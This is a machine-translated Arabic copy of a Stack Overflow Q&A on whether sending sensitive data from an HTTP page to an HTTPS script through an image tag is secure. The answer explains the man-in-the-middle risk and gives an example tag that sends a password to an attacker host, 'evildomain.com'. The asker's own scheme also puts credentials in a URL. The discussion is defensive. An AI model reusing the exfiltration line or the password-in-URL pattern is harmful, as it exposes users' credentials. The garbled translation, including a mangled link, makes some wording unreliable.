http, https & ajax تجاوز ربما ؟
https://stackoverflow.com/questions/1541329
-
20-09-2019 - |
italiano
english
français
española
中国
日本の
العربية
Deutsch
한국어
Português
Russianسؤال
لدي الخادم النصي التي تحتاج إلى تمرير البيانات من المتصفح دون إعادة تحميل الصفحة (ويعرف أيضا باسم ajax).البيانات الحساسة لذا يجب أن ترسل عبر https.الصفحة ومع ذلك هو على http طبقة.بسبب نفس المجال/بروتوكول تقييد, المتصفح لا يسمح بذلك.
أنا أفكر الغش النظام قليلا عن طريق حيوي إنشاء صورة العلامات استدعاء البرنامج النصي باستخدام src الوسم مثل:
<img src="https://mydomain.com/mysecurescript/&data=to&pass=to&my=script" />
أود أن أعرف إذا كان هذا في الواقع سوف تكون مشفرة بشكل صحيح.
المحلول
والمشكلة مع ذلك هو إذا كانت الصفحة نفسها هي فقط HTTP، ثم كنت عرضة للرجل في هجوم الأوسط. يمكن للمهاجم تعديل فقط البرنامج النصي في الصفحة إرسالها عبر HTTP بحيث بدلا من ذلك يستخدم:
<img src="http://evildomain.com/evilproxyscript/&data=to&pass=to&my=script" />
وللمستخدم سيكون لا شيء، على أكثر حكمة. للالتفاف على هذا كنت حقا بحاجة الى خدمة الصفحة عبر HTTPS جدا - الذي يحل المشكلة بدقة الأخرى الخاصة بك في نفس الوقت
(وهذا هو بالضبط نفس السبب لماذا يجب أن تكون أشكال الدخول على صفحات HTTPS، بدلا من مجرد إجراء نموذج يجري HTTPS).
نصائح أخرى
نعم و لا.
عنوان الخادم جزء من URL الواضح غير مشفرة منذ يتم استخدامه لإعداد اتصال.
كل شيء آخر هو المشفرة في حين يجري إرسالها عبر اتصال HTTPS.ولكن أي شخص عرض المصدر من الواضح سوف تكون قادرا على رؤية البيانات التي يتم نشرها.
وكما يجدر بالذكر أن بعض المتصفحات لن يتم عرض (أو سوف تحذير المستخدم قبل عرض) الوضع المختلط (HTTP في مقابل https) HTML الصفحات. في بعض الحالات، وهذا لا يجوز العمل لأن يختار المستخدم لمنع ذلك.
وثمة بديل ممكن لأسلوب صورة (العيب منها، كما ذكر من قبل الآخرين، هو لم يعالج هذا المحتوى الوضع المختلط تفضلت بعض المتصفحات) سوف كتبها <وأ href = "http://assl.sullof.com / ASSL / "يختلط =" noreferrer نوفولو "> ASSL .
وكلا الأسلوبين سوف يؤدي إلى حدوث التشفير، وكلاهما لا يزال عرضة للرجل في طريق الوسط.
